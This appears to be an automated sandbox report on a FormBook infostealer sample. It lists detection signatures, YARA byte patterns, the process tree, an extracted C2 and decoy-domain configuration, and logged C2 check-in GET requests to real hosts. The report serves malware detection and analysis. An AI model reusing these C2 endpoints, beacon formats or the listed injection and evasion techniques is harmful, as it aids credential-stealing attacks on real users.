
Windows Analysis Report DN_467842234567.exe

Overview

General Information

Sample Name: DN_467842234567.exe
Analysis ID: 491743
MD5: c16013ea29f9dd1525dcb65c2184784e
SHA1: 5afd533f29573050734e428f9f8c9ba08c79546a
SHA256: df05d916a02c09e1dba0df0841f93697e407a334ce8d2371dfe8befd909d8a43
Tags: exe, Formbook, xloader

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for dropped file
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

Process Tree

  • System is w10x64
  • DN_467842234567.exe (PID: 1088 cmdline: 'C:\Users\user\Desktop\DN_467842234567.exe' MD5: C16013EA29F9DD1525DCB65C2184784E)
    • DN_467842234567.exe (PID: 6416 cmdline: 'C:\Users\user\Desktop\DN_467842234567.exe' MD5: C16013EA29F9DD1525DCB65C2184784E)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • WWAHost.exe (PID: 4388 cmdline: C:\Windows\SysWOW64\WWAHost.exe MD5: 370C260333EB3149EF4E49C8F64652A0)
          • cmd.exe (PID: 5492 cmdline: /c del 'C:\Users\user\Desktop\DN_467842234567.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5180 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.bofight.store/r95e/"], "decoy": ["mindyourbusinesscoin.com", "melandri.club", "13011196.com", "bespinpoker.com", "ohchainpodklo.xyz", "paolacapitanio.com", "hnczppjs.com", "healthygold-carefit.club", "drive16pay.art", "5foldmastermind.com", "especialistasorteios.online", "cjcveterotqze.com", "originaldigitalspaces.com", "21lawsofconfidence.com", "uscryptomininglaws.com", "nilist.xyz", "bergstromgreenholt.icu", "dumbasslures.com", "companieus.com", "2gtfy0.com", "jpbrunos.com", "cdsensor.host", "memorypc.gmbh", "blue-music.com", "lottochain.bet", "exegen.online", "gardenmanager.net", "tyczhhapph5.com", "financecreditpro.com", "you-teikeis.site", "portale-accessi-anomali.com", "performansorganizasyon.xyz", "coinoforum.com", "kagulowa.com", "kxdrstone.com", "projudi-poker.com", "glu-coin.com", "mremvd.icu", "smpldebts.com", "gabgbang.com", "hoochhousebar.com", "zuowxk.icu", "whatipm.com", "healthcaresms.com", "nurhalilah.xyz", "platforma-gaz.space", "railrats.com", "lastmedicalcard.com", "1auwifsr.icu", "ctgybebuy.com", "2377k.com", "mightynz.com", "sbcsdaia.com", "conversionlist.com", "ventas.rest", "scotlaenlinea.site", "byemreperde.com", "getsilverberg.com", "meannamemories.com", "signotimes.com", "jhuipx1cnb.xyz", "5apchk35.xyz", "tspd.site", "aoshihuanyu.com"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x46a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x4191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x47a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Unpacked PEs

Source | Rule | Description | Author | Strings
1.2.DN_467842234567.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
1.2.DN_467842234567.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x85f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8992:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x146a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14191:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x147a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1491f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x93aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1340c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa122:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19b97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ac3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1.2.DN_467842234567.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x16ac9:$sqlite3step: 68 34 1C 7B E1
  • 0x16bdc:$sqlite3step: 68 34 1C 7B E1
  • 0x16af8:$sqlite3text: 68 38 2A 90 C5
  • 0x16c1d:$sqlite3text: 68 38 2A 90 C5
  • 0x16b0b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x16c33:$sqlite3blob: 68 53 D8 7F 8C
0.2.DN_467842234567.exe.e920000.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0.2.DN_467842234567.exe.e920000.3.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x77f8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b92:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x138a5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13391:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x139a7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b1f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x85aa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1260c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9322:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18d97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19e3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview


AV Detection:

Found malware configuration
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp | Malware Configuration Extractor: FormBook (the same C2 list and decoy domains as given under Malware Configuration above)
Multi AV Scanner detection for submitted file
Source: DN_467842234567.exe | ReversingLabs: Detection: 64%
Yara detected FormBook
Source: Yara match | File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll | ReversingLabs: Detection: 11%
Machine Learning detection for sample
Source: DN_467842234567.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\nslF1C.tmp\rcgwzvp.dll | Joe Sandbox ML: detected
Source: 1.1.DN_467842234567.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.DN_467842234567.exe.e920000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.WWAHost.exe.3d57968.4.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 1.2.DN_467842234567.exe.400000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 7.2.WWAHost.exe.a398b0.0.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: DN_467842234567.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: Binary string: WWAHost.pdb source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
Source: Binary string: WWAHost.pdbUGP source: DN_467842234567.exe, 00000001.00000002.734645051.0000000000A60000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP source: DN_467842234567.exe, 00000000.00000003.669973012.000000000EAF0000.00000004.00000001.sdmp, DN_467842234567.exe, 00000001.00000002.734771841.0000000000B60000.00000040.00000001.sdmp, WWAHost.exe, 00000007.00000002.934191188.0000000003820000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb source: DN_467842234567.exe, WWAHost.exe
Source: C:\Users\user\Desktop\DN_467842234567.exe | Code function: 0_2_00405EC2 FindFirstFileA,FindClose,
Source: C:\Users\user\Desktop\DN_467842234567.exe | Code function: 0_2_004054EC DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\user\Desktop\DN_467842234567.exe | Code function: 0_2_00402671 FindFirstFileA,
Source: C:\Users\user\Desktop\DN_467842234567.exe | Code function: 4x nop then pop esi
Source: C:\Users\user\Desktop\DN_467842234567.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 4x nop then pop esi
Source: C:\Windows\SysWOW64\WWAHost.exe | Code function: 4x nop then pop esi

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49839 -> 5.9.90.226:80
Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.4:49849 -> 35.246.6.109:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.kxdrstone.com
Source: C:\Windows\explorer.exe | Domain query: www.financecreditpro.com
Source: C:\Windows\explorer.exe | Domain query: www.2377k.com
Source: C:\Windows\explorer.exe | Domain query: www.portale-accessi-anomali.com
Source: C:\Windows\explorer.exe | Network Connect: 5.9.90.226 80
Source: C:\Windows\explorer.exe | Domain query: www.nurhalilah.xyz
Source: C:\Windows\explorer.exe | Domain query: www.uscryptomininglaws.com
Source: C:\Windows\explorer.exe | Domain query: www.healthcaresms.com
Source: C:\Windows\explorer.exe | Network Connect: 104.21.11.163 80
Source: C:\Windows\explorer.exe | Domain query: www.drive16pay.art
Source: C:\Windows\explorer.exe | Network Connect: 35.246.6.109 80
Source: C:\Windows\explorer.exe | Domain query: www.lottochain.bet
Source: C:\Windows\explorer.exe | Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe | Network Connect: 172.67.148.98 80
Source: C:\Windows\explorer.exe | Domain query: www.smpldebts.com
Source: C:\Windows\explorer.exe | Network Connect: 202.165.66.108 80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe | DNS query: www.nurhalilah.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor | URLs: www.bofight.store/r95e/
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: global traffic | HTTP traffic detected: GET /r95e/?5jTDyZ=M4286+QNvZx8LKmy/UZnIHKCdMprwtwgM1NJPmpLuQigTfxCAf78NurDWqizjXHDX4ej&l2M=TL00 HTTP/1.1 | Host: www.nurhalilah.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /r95e/?5jTDyZ=BXQ0bbTmKEXRUVKMKrV3wGde7K0OnYr2R+4D0hwUDGvbHRTPKc91vtcYWtUAnnCzzr+p&l2M=TL00 HTTP/1.1 | Host: www.uscryptomininglaws.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /r95e/?5jTDyZ=TvKiO4/QDjaQNmJvqYzYpGMovSyo6lhw1ZKWJ3cUrN1tKoZgxWwrK5KCn4028QL8xxrY&l2M=TL00 HTTP/1.1 | Host: www.financecreditpro.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /r95e/?5jTDyZ=TgnCaJJuD0kHzauLDq/dXM7zvJjUq4JZJEpqJXalrHOYrpD3Izw002IN0NuSyeqNHOZT&l2M=TL00 HTTP/1.1 | Host: www.lottochain.bet | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /r95e/?5jTDyZ=Bz2f4T/F+fkIMVoJU/amRd6ca64J0uSW6dugIGIPMe5NoTdXMzMXV3yFXHZPUv8ChFjS&l2M=TL00 HTTP/1.1 | Host: www.2377k.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: GET /r95e/?5jTDyZ=hlNCb9FJCcnwseEpDycOVhynUMT+mMuln2sCiD+HHAGMht96K5ziw8KZ4U389UfCWXdM&l2M=TL00 HTTP/1.1 | Host: www.drive16pay.art | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii:
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found | Date: Mon, 27 Sep 2021 19:07:12 GMT | Content-Type: text/html; charset=utf-8 | Transfer-Encoding: chunked | Connection: close | vary: Accept-Encoding | CF-Cache-Status: DYNAMIC | Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=L1%2Fcb9sF0iYG9tLZL%2BCND7WWwL50k6FpCO6GkNPjTY8HledrDzcbyuzJAJs%2BC3yUD5GaZvDIhbwwTZOsvt8Qf3jJY5JuckW7ioIU2oZopXGVv5Lg9KbGsLMIggxHDd9g"}],"group":"cf-nel","max_age":604800} | NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} | Server: cloudflare | CF-RAY: 6957037758895c14-FRA | alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400 | Data Ascii: 1c1f<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color:
Source: DN_467842234567.exe | String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: DN_467842234567.exe | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: unknown | DNS traffic detected: queries for: www.kxdrstone.com
Source: C:\Users\user\Desktop\DN_467842234567.exe | Code function: 0_2_00404FF1 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,

E-Banking Fraud:

Yara detected FormBook
Source: Yara match | File source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.1.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.DN_467842234567.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.933413799.0000000000560000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.707107290.000000000F01F000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.733960766.00000000006B0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000001.672837391.0000000000400000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.933463870.00000000005D0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.933639960.00000000010A0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.734022978.00000000006E0000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.733801528.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.676287295.000000000E920000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000000.722397924.000000000F01F000.00000040.00020000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: DN_467842234567.exe | Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 1.2.DN_467842234567.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0.2.DN_467842234567.exe.e920000.3.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0.2.DN_467842234567.exe.e920000.3.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
